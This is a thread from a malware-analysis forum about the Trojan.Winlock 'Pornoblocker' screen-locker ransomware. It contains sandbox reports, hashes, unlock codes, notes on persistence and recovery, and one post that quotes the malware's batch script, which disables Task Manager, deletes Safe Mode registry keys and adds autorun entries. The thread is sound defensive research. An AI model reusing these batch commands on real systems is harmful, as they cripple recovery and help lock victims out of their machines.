A forum for reverse engineering, OS internals and malware analysis 

Trojan.Winlock - Pornoblocker

Forum for analysis and discussion about malware.

Re: Trojan.Winlock - Pornoblocker

 #18067  by Buster_BSA
 Wed Feb 06, 2013 6:10 pm
EP_X0FF wrote:Attached sample downloaded before server block.
codfullhdxavi.exe is now detected as Trojan:Win32/LockScreen.AO
Code: Select all
 Report generated with Buster Sandbox Analyzer 1.87 at 19:08:55 on 06/02/2013

 [ General information ]
   * Analysis duration: 00:00:15
   * File name: c:\m\test\codfullhdxavi.exe
   * File length: 1738240 bytes
   * File signature (PEiD): PureBasic 4.x -> Neil Hodgson *
   * File signature (Exeinfo): *** Unknown EXE  - Checksum is Set -  Std Compiler section  [DebuG]
   * File type: EXE
   * TLS hooks: NO
   * File entropy: 7.99646 (99.9558%)
   * ssdeep signature: 49152:muTQnzVZm8qkgjKb2zrgy1B4yE/eGh0RF2NPwwg:J4zK7kKSUgy1Ch0K
   * Adobe Malware Classifier: Unknown
   * Digital signature: Unsigned
   * MD5 hash: cc7285b763449cf42ea3bcad37aa76fb
   * SHA1 hash: f128e0cd6ee65efd2a9673f3a1cb2d745688b709
   * SHA256 hash: 763d064c10fdc3a22b31197ed47f6093fbb1409ab899afa630e62330277b24aa

 [ Changes to filesystem ]
   * No changes

 [ Changes to registry ]
   * Creates value "Shell=C:\M\TEST\codfullhdxavi.EXE" in key HKEY_CURRENT_USER\software\Microsoft\Windows NT\CurrentVersion\Winlogon
              binary data=43003A005C004D005C0054004500530054005C0063006F006400660075006C006C006800640078006100760069002E004500580045000000

 [ Network services ]
   * No changes

 [ Process/window/string information ]
   * Gets input locale identifiers.
   * Checks for debuggers.
   * Installs a hook procedure that monitors keystroke messages.
   * Locks screen.

Re: Trojan.Winlock - Pornoblocker

 #18800  by EP_X0FF
 Mon Apr 01, 2013 6:19 pm
Unlock code: 44650

Detection ratio: 1 / 46

SHA256: 83b1aa77cd921502a4b7e5189557742fff67cfe91c1fb682e093921c0b817f23
SHA1: 7ed6cb0573dced301b09709fe9932a6b99cec85a
MD5: b5e041c8724bdbd39d950fca8de87e28

https://www.virustotal.com/en/file/83b1 ... 364839482/
Attachments
pass: infected
(748.57 KiB) Downloaded 95 times

Re: Trojan.Winlock - Pornoblocker

 #19126  by EP_X0FF
 Wed May 01, 2013 3:19 am
Source sold (http://blog.webroot.com/2013/04/30/mana ... -the-wild/) someone and here is first "remake".

SHA256: 898c2aa263fe5ac88fe42e879357039d1b11685a43cd14c7e6706051106fddf5
SHA1: c5fb4da2664b2af95102e068573e7c1b55405399
MD5: 3cd2797acfa7f167b245b66d4164ebb2

https://www.virustotal.com/en/file/898c ... 367377183/

Unblock code: 643271749
Warning: original script-kiddie author source was bugged and this ransom bugged even more - it will NOT remove itself even after entering correct unblock code. Due to high impact on system this malware does (replace system files, deletes all registry entries related to Safe Mode) additional recovery steps required.

Runs from:

HKCU\Software\Microsoft\Windows\CurrentVersion\Run as Sound c:\windows\sound.bat

X:\Documents and Settings\UserName\Start Menu\Programs\Startup (where X represent system drive)
random_name = path to exe
random_name = path to bat (see below)

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run as
random_name = path to exe
random_name = path to bat (see below)

Renames taskmgr.exe to mdsdba.dll (this triggers WFP).

Masterpiece from this malware:
@echo off
taskkill /f /im explorer.exe
@echo off
Reg Delete HKLM\System\CurrentControlSet\Control\SafeBoot\*.* /q
Reg Delete HKLM\System\CurrentControlSet\Control\SafeBoot /q
@echo off
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f >nul
@echo off
Reg Delete HKLM\System\CurrentControlSet\Control\SafeBoot\*.* /q
Reg Delete HKLM\System\CurrentControlSet\Control\SafeBoot /q
copy %0 %windir%\Win32.bat > nul
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run
/v Win32 /t REG_SZ /d %windir%\Win32.bat /f
@echo off
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f >nul
@echo off
Title Sound
start Sound.exe
/facepalm.
Attachments
pass: infected
(1.05 MiB) Downloaded 86 times

Re: Trojan.Winlock - Pornoblocker

 #20624  by EP_X0FF
 Wed Aug 28, 2013 3:43 pm
FUD

SHA256: c622e4e8a33d2253448cc462bccd308a5a74805ed324f72c47fce0eb04fc9366
SHA1: 24e8a307628ca4bc0db57f79c545ff6d91e7a005
MD5: ba8b9fb7432560fa4978754c3bbd90b6

https://www.virustotal.com/en/file/c622 ... 377704196/

Drop zone hxxp://besthdvids.ru/

Decrypted (runpe)
https://www.virustotal.com/en/file/2144 ... 377704409/

Code to unlock Windows: 83630
Attachments
pass: infected
(463.63 KiB) Downloaded 67 times
pass: infected
(1.64 MiB) Downloaded 105 times

Re: Trojan.Winlock - Pornoblocker

 #21536  by patriq
 Mon Dec 02, 2013 9:06 pm
Kafeine wrote:Maybe not related to this thread...sorry if so.

Pushed in GrandSoft Exploit Kit in Russia since weeks:
Image
Design :
Image

e1344f814885baeef6af0d2e8993811c

Some thoughts on the phone number included..typical ransomware would have the victim buy uKash or something like that. Can anyone translate the message?

+7 964 987 8567
phone number in Russia.
+7 is international calling code for RU.
prefix 964 appears to be 'new' as in it is not on legacy listings for carriers.
Maybe a mobile pre-paid or SIP provider?

Not sure why this info cant be used to catch this fucker... oh yeah, its Russia. :roll:

Re: Trojan.Winlock - Pornoblocker

 #22714  by ada101
 Tue Apr 22, 2014 2:06 pm
patriq wrote: Can anyone translate the message?
Google Translate Results in the following:
Image
Not very good, but gets the message across.
 Return to “Malware”